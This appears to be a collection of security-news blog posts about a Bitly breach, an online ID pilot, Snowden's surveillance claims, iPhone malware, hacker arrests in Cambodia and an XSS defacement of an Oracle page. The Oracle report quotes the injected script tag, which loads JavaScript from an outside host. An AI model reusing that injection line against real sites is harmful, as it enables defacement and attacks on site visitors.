URL Shortening service Bitly hacked, Change your password and Revoke Access from your social accounts post by Anand Garg

One of the Biggest URL shortening service Bitly has been hacked through a security breach and Hackershave stolen your passwords and the Most important thing OAuth Tokens– which we use to Login into Bitly through our social accounts like Facebook, Twitter.

Government starts testing a Program in which a user must have License (Internet ID) to access the Internet post by Anand Garg

National Institute of Standards and Technology (NIST) has issued $2.4 million for testing a government-based online identity system in Michigan and Pennsylvania. The initiative was developed under the “NationalStrategy for Trusted Identities in Cyberspace” program for years and now is rolled-out for field testing.

Snowden says that everyone is now under government surveillance post by Anand Garg

Snowden says that everyone is now under government surveillance

Edward Snowden, former CIA contractor, declared during a debate regarding the NSA intelligence gatheringprograms that government surveillance has reached a new level. During the debate that took place in Toronto, Snowden declared that all the population is being motorized, meaning that the intelligencegathering programs make no discrimination when it comes to citizens taken as individuals:
“It’s no longer based on the traditional practice of targeted taps based on some individual suspicion of wrongdoing” Snowden said. “It covers phone calls, emails, texts, search history, what you buy, who your friends are, where you go, who you love.”

Jailbroken iPhones are being targeted by an active malware campaign, stealing passwords Post by Anand Garg

A malware campaign has been unearthed by security researcher Stefan Esser after many of the users of jailbroken iPhones and iPads posted on Reddit that their devices crashed repeatedly after installing unofficial tweaks through a third-party app store called ‘Cydia’ which serves the market of jailbroken  Apple devices.

Two Anonymous Hackers arrested in Joint Operation With FBI Post by Anand Garg

Cambodian National Police has arrested two members of Anonymous Cambodia earlier this month, April 7, in a joint operation with the U.S. Federal Bureau of Investigation (FBI) which has been running for about eight months according to a statement available on the website of National Police. Both arrested personal are members of the global ‘Anonymous’ hacking group which called for attack on Israeli cyberspace earlier this month on the same date that is 7^th April.

They are identified as Bun Khing Mongkul Panha and Chou Songheng. Both are 21 years old and were third-year students at the SETEC Institute, a Phnom Penh-based university. Panha is identified online as ‘Sex Machine’ and ‘Black Cyber’ whereas Songheng is known in cyberspace as ‘Zoro’. The reason for their arrest is the hacking of 30 government websites as well as some private business websites. The hacking profile includes big names such as National Election Committee (NEC), Ministry of Foreign Affairs, Ministry of Defense, Anti-Corruption Unit and Phnom Penh Municipality.

Mr. Panha has confessed about the hacking and Mr. Songheng said he just wanted to learn hacking and is Mr. Panha’s student.

“He just wanted to learn about it. That is why he decided to join the hacker group,” the statement said of Mr. Songheng.

They are arrested under Cambodian Criminal Code,articles 427, 428 and 429, which concerns with information technology and penalizes the culprit with 500 USD to 1000 USD fine with one to two years behind bars.

“The suspects are still under investigation by the court, so they have detained them for trial,” said Dim Chaoseng, the lawyer for Mr. Panha and Mr. Songheng.

Rasch, the former head of the U.S. Department of Justice Computer Crime Unit, said:

“These are not considered major crimes.”

“Since [Cambodia] doesn’t have a cybercrime law, they can’t charge them with more serious crimes.”

Lieutenant General Chhay Sinarith, director of the Ministry of Interior’s internal security department, said the arrest is part of an ongoing effort in cooperation of FBI. He said:

“The National Police were cooperating with the FBI to conduct an investigation on [hacking] when we found out these two suspects hacked the NEC…and other government institutions.”

Refrence by- hackersnewsbulletin.com

Meet the First Password Free email service, now you don’t have to remember your passwords Post by Anand Garg

Meet the First Password Free email service, now you don’t have to remember your passwords

ORACLE Subdomain Page Defaced by Indian Hacker

A group of Indian Hackers dubbed as I-HOS TEAM has successfully defaced a page on the sub domain of Oracle Corporation, biggest provider of enterprise software, computer hardware and Services.

The users visiting the domain are being greeted with a custom webpage with black background and the theme song of an Indian Movie “BOSS”. The defacement page is displaying a logo with title “IHOS - Indian Hackers Online Squad” with a quotation for all the Indian hackers shows, “LOVE TO ALL INDIAN HACKERS OUT THERE.”

Neither the website nor the server was actually compromised, but the Hacker going by online alias ‘Bl@Ck Dr@GoN’, actually found a page on the Oracle website that allows him to inject HTML/JavaScript code into the Oracle University Electronic Attendance webpage in order to modify the content, as shown in the screenshot provided to The Hacker News:

Hacker told THN that anyone is able to edit the Student name on the website and can insert any code, which is not sanitized properly by the Oracle website. This is awful to see that World’s biggest programming and Software company failed to protect their website from very basic Cross Site Scriptingvulnerability.

Defaced Link: Click Here
Injected Javascript: <script src=http://oppwnjms.loomhost.com/bd1.js></script>

At the time of writing, the website was defaced and in case it got fixed, users may check the defaced website’s mirror at Zone-H.

In most of the cases, a hacker look to promote a specific cause when defacing a high profile site, but in this case there seems to have no specified reason to deface the web page. We mostly have seen the defacement of website by the hackers lifting boring messages like “Hello World” or similar, but this is the first time when Oracle Web page is sounding Yo Yo Honey Singh’s beat-full Song.